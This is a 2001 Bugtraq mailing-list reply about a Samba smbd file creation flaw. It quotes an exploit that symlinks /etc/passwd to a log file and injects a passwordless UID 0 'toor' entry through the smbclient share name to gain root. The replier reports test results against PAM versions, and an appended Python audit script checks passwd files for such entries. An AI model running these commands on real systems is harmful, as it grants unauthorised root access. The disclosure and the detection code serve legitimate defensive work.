Bugtraq mailing list archives
Re: smbd remote file creation vulnerability
From: maniac () localhost sk
Date: Mon, 25 Jun 2001 00:14:02 +0200
Exploit:

This is the scenario of local privilege escalation attack against RedHat 7.x installation:

$ ln -s /etc/passwd /tmp/x.log
$ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
  -n ../../../tmp/x -N

...where 'NIMUE' stands for local host name (few error messages should be returned).

$ su toor
#
Hi,

Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) by default logs here:

/var/log/samba/log.%m

I replaced it with /var/log/samba/%m.log and used your exploit, which worked - this line was also appended to /etc/passwd:

  toor::0:0::/:/bin/sh

But as long as there were those two spaces at the beginning of the line, it was impossible to su to that account. This is the error message:

Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown

I tried to insert \r after the first \n, but unsuccessfully. I'm using pam-0.72-7mdk.

These versions of PAM also don't permit spaces at the beginning of a line:

pam-0.72-20.6.x (Redhat6.2)
pam-0.74-6mdk (Mandrake8.0)

Maybe sshd without PAM support and permitting empty password may be 'vulnerable' on such systems.

maniac
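A defensive check for the kind of entry discussed in this message, as an added example that is not part of the original post: it scans passwd-format text for appended log debris, the space-prefixed `toor` line, and UID 0 or empty-password accounts. The sample file contents, including the log header line, are constructed for illustration.

```python
# Constructed sample: a passwd file after log output was appended to it.
# The bracketed log header line is illustrative, not captured smbd output.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
maniac:x:501:501::/home/maniac:/bin/bash
[2001/06/24 23:20:11, 0] constructed log header line
  toor::0:0::/:/bin/sh
toor::0:0::/:/bin/sh
"""


def audit_passwd(text):
    """Return (line_number, reason, line) findings for suspicious entries."""
    findings = []
    for num, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            findings.append((num, "blank line", line))
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # Log text written into the file rarely has the 7-field layout.
            findings.append((num, "malformed entry (not 7 fields)", line))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if name != name.strip():
            # The case from the post: some PAM versions ignore such a line,
            # but it is still evidence that something wrote to the file.
            findings.append((num, "whitespace around account name", line))
        if not uid.isdigit():
            findings.append((num, "non-numeric UID", line))
            continue
        if int(uid) == 0 and name.strip() != "root":
            findings.append((num, "UID 0 account other than root", line))
        if passwd == "":
            findings.append((num, "empty password field", line))
    return findings


if __name__ == "__main__":
    for num, reason, line in audit_passwd(SAMPLE_PASSWD):
        print(f"line {num}: {reason}: {line!r}")
```

To audit a live system, pass the contents of /etc/passwd to `audit_passwd` instead of the sample string.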